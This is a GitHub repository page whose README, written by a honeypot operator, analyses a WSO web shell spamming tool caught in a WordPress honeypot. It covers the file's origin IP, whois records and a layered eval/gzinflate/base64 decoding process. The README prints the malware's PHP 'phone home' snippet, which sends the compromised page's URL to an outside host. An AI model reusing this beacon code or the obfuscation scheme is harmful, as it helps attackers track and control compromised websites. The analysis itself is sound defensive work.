Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
5.149.250.196WjcyqoD-WcEZBqVmxA8u7wAAAAA.0.file
5.149.250.196WjcyqoD-WcEZBqVmxA8u7wAAAAA.wso.scans
README.md
dc1.php
dc2.php
dc3.php
dc4.php
dc5.php
dc6.php
dc8.php
dc9.php
downloader

README.md

db-config.php - Email spamming tool

An Email spamming tool layered on top of an instance of the WSO web shell. There's also a little chunk of "phone home" code:

if (file_exists('data.bin')==false){
$url = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
file_get_contents("http://3x.od.ua/shell/index.php?shell=".base64_encode($url));
$fp1 = fopen("data.bin", "w");
fclose($fp1);
}

Sends URL of db-config.php to a Ukrainian web site. Leaves an empty file named "data.bin" lying around.

Origin

IP Address 5.149.250.196

person:         Vilko Damianov
address:        4000, Bulgaria, Plovdiv, 2 Lyuben Karavelov, unit 5
phone:          +35932571279
nic-hdl:        VD3206-RIPE
mnt-by:         HZ-HOSTING-LTD
created:        2016-11-28T15:25:07Z
last-modified:  2016-11-28T15:25:07Z
source:         RIPE

% Information related to '5.149.250.0/23AS61046'

route:          5.149.250.0/23
descr:          HZ-HOSTING-LTD
origin:         AS61046
mnt-by:         HZ-HOSTING-LTD
created:        2013-03-05T14:08:17Z
last-modified:  2016-11-28T19:10:21Z
source:         RIPE

5.149.250.196 is apparently located in London, UK.

Download

Downloaded to a fake WSO web shell, part of a WordPress honey pot. Part of a larger campaign of maybe re-corrupting a WordPress site, that someone else had previously installed WSO on.

Decoding

Did a string of hand edits and executes:

  1. 5.149.250.196WjcyqoD-WcEZBqVmxA8u7wAAAAA.0.filedc1.php
  2. dc1.phpdc2.php
  3. dc2.phpdc3.php
  4. dc3.phpdc4.php
  5. dc4.phpdc5.php
  6. dc5.phpdc6.php
  7. dc6.phpdc8.php
  8. dc8.phpdc9.php

In each case, I had to replace eval with print, and possibly add a "<?php" opening tag.

Some automated encoding program must exist, which has a choice of how many layers of about 3 different obfuscation methods you want applied.

File dc9.php has the code that a correct invocation of its URL would execute, after the 8 or 9 levels of eval(gzinflate(base64_decode())) get executed.